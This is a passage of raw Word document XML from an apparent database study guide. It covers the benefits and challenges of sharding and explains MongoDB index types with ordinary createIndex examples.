    <w:p w14:paraId="71F77D9F" w14:textId="77777777" w:rsidR="00FB3E62" w:rsidRPr="00DA2F32" w:rsidRDefault="00FB3E62" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="476"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Efficient Resource Utilization</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9B315A"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Different shards can be optimized based on their specific workload characteristics. For example, high-traffic shards can be placed on more powerful servers, while low-traffic shards can be placed on less powerful ones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C11572"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an e-commerce platform, shards containing data for high-traffic product categories can be hosted on servers with more CPU and memory resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2460A8C2" w14:textId="77777777" w:rsidR="00FB3E62" w:rsidRPr="00DA2F32" w:rsidRDefault="00FB3E62" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="476"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Geographic Distribution</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B36D4FF"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Description</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Shards can be distributed across different geographic regions, reducing latency for users by placing data closer to where it is accessed most frequently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71960F27" w14:textId="77777777" w:rsidR="00FB3E62" w:rsidRPr="00DA2F32" w:rsidRDefault="00FB3E62" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="476"/>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 global application can store data for European users in a shard hosted in Europe, while data for American users is stored in a shard hosted in the U.S.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D0472D" w14:textId="77777777" w:rsidR="00FB3E62" w:rsidRPr="00DA2F32" w:rsidRDefault="00FB3E62" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Challenges of Horizontal Partitioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65475480" w14:textId="77777777" w:rsidR="00FB3E62" w:rsidRPr="00DA2F32" w:rsidRDefault="00FB3E62" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="477"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Complexity in Querying</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C819374" w14:textId="77777777" w:rsidR="00FB3E62" w:rsidRPr="00DA2F32" w:rsidRDefault="00FB3E62" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="477"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Queries that need to access data from multiple shards can become complex and may require additional coordination. For instance, aggregating data across shards requires merging results from multiple nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1202CAFF" w14:textId="77777777" w:rsidR="00FB3E62" w:rsidRPr="00DA2F32" w:rsidRDefault="00FB3E62" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="477"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Rebalancing Shards</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103243E0" w14:textId="77777777" w:rsidR="00FB3E62" w:rsidRPr="00DA2F32" w:rsidRDefault="00FB3E62" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="477"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>As data grows, existing shards may need to be split or rebalanced, which can be complex and may require downtime or sophisticated tooling to achieve.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7362946E" w14:textId="77777777" w:rsidR="00FB3E62" w:rsidRPr="00DA2F32" w:rsidRDefault="00FB3E62" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="477"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Data Consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E538AC" w14:textId="77777777" w:rsidR="00FB3E62" w:rsidRPr="00DA2F32" w:rsidRDefault="00FB3E62" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="477"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Maintaining strong consistency across shards can be challenging, especially in distributed systems where network partitions or delays may occur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBBE9F1" w14:textId="77777777" w:rsidR="00FB3E62" w:rsidRPr="00DA2F32" w:rsidRDefault="00FB3E62" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="477"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Operational Overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070A72A9" w14:textId="77777777" w:rsidR="00FB3E62" w:rsidRPr="00DA2F32" w:rsidRDefault="00FB3E62" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="477"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Managing multiple shards adds operational complexity, including the need for monitoring, backups, and recovery processes for each shard individually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A45565" w14:textId="77777777" w:rsidR="00ED3968" w:rsidRPr="00DA2F32" w:rsidRDefault="00ED3968" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="147BFFF0" w14:textId="22DF21F5" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="145" w:name="_Toc178383327"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Explain how indexing works in MongoDB to optimize query performance.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="145"/>
    </w:p>
    <w:p w14:paraId="01498582" w14:textId="77777777" w:rsidR="00180100" w:rsidRPr="00DA2F32" w:rsidRDefault="00180100" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Indexing in MongoDB is a critical feature that optimizes query performance by allowing the database to efficiently locate and retrieve documents within a collection. Without indexes, MongoDB must perform a full collection scan to find documents, which is time-consuming and resource-intensive, especially for large datasets. By creating indexes, MongoDB can quickly narrow down the search space, significantly speeding up query execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C936FAA" w14:textId="77777777" w:rsidR="00180100" w:rsidRPr="00DA2F32" w:rsidRDefault="00180100" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How Indexing Works in MongoDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2FC9BD" w14:textId="77777777" w:rsidR="00180100" w:rsidRPr="00DA2F32" w:rsidRDefault="00180100" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="478"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Index Structure</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275B3C24"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">MongoDB uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>B-tree data structure</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> for its indexes. A B-tree is a balanced tree that maintains sorted data and allows searches, sequential access, insertions, and deletions in logarithmic time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721EFACE"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In MongoDB, indexes store the values of the indexed fields in a sorted order, along with pointers to the corresponding documents in the collection. This allows the database to quickly traverse the index to locate the relevant documents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2988A6DA" w14:textId="77777777" w:rsidR="00180100" w:rsidRPr="00DA2F32" w:rsidRDefault="00180100" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="478"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Types of Indexes</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A75AFF7"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Single Field Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEC8E78"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Indexes only one field in a collection. Queries filtering or sorting by this field can use the index to quickly retrieve the documents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01224F44"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Example: db.collection.createIndex({ "username": 1 }) creates an ascending index on the username field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4783A0"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Compound Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E915322"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Indexes multiple fields in a specific order. Compound indexes can support queries that filter by all the indexed fields, the first field, or the first few fields in the index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282F4C08"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lastRenderedPageBreak/>
        <w:t>Example: db.collection.createIndex({ "firstName": 1, "lastName": 1 }) indexes both firstName and lastName fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398496C3"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Multikey Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E989819"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Indexes fields that contain arrays. MongoDB creates an index entry for each element in the array, allowing efficient querying on array contents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0FC815"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Example: db.collection.createIndex({ "tags": 1 }) indexes the tags array field, allowing searches for documents containing specific tags.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7B8EAC"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Text Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1D0313"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Supports text search queries for string content. Text indexes are used to search for words or phrases within a string field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0BB848"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Example: db.collection.createIndex({ "description": "text" }) enables full-text search on the description field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA98DD5"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Geospatial Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B2D888"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Optimizes queries that involve geospatial data, such as location-based searches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D299D10"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Example: db.collection.createIndex({ "location": "2dsphere" }) indexes geographic coordinates for geospatial queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407B6FD7"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Hashed Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7E5CDA"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Indexes a field using a hashed value. Hashed indexes are commonly used for sharding, as they ensure an even data distribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBCF78E"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Example: db.collection.createIndex({ "_id": "hashed" }) creates a hashed index on the _id field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3871CCB1"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Wildcard Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C66E6F"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Indexes all fields of a document that match a specified pattern. Wildcard indexes are useful for indexing fields with dynamic or unpredictable names.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57873A6A"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example: db.collection.createIndex({ "$**": 1 }) creates a wildcard index for all fields in a document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D8E725" w14:textId="77777777" w:rsidR="00180100" w:rsidRPr="00DA2F32" w:rsidRDefault="00180100" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="478"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Query Optimization Using Indexes</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11287EAA"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>When a query is executed, MongoDB’s query optimizer evaluates the available indexes and determines the most efficient one to use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598FFBED"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>MongoDB can use indexes to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C08779"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Filter results</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Retrieve only documents that match the query criteria without scanning the entire collection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C19CE4E"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Sort results</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Quickly sort documents based on the indexed fields without an additional sorting step.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550C334B" w14:textId="77777777" w:rsidR="00180100" w:rsidRPr="00DA2F32" w:rsidRDefault="00180100" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="478"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Aggregate data</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Efficiently aggregate data, especially when using $group, $sort, or $match stages in aggregation pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50189D7C" w14:textId="77777777" w:rsidR="00180100" w:rsidRPr="00DA2F32" w:rsidRDefault="00180100" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="478"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
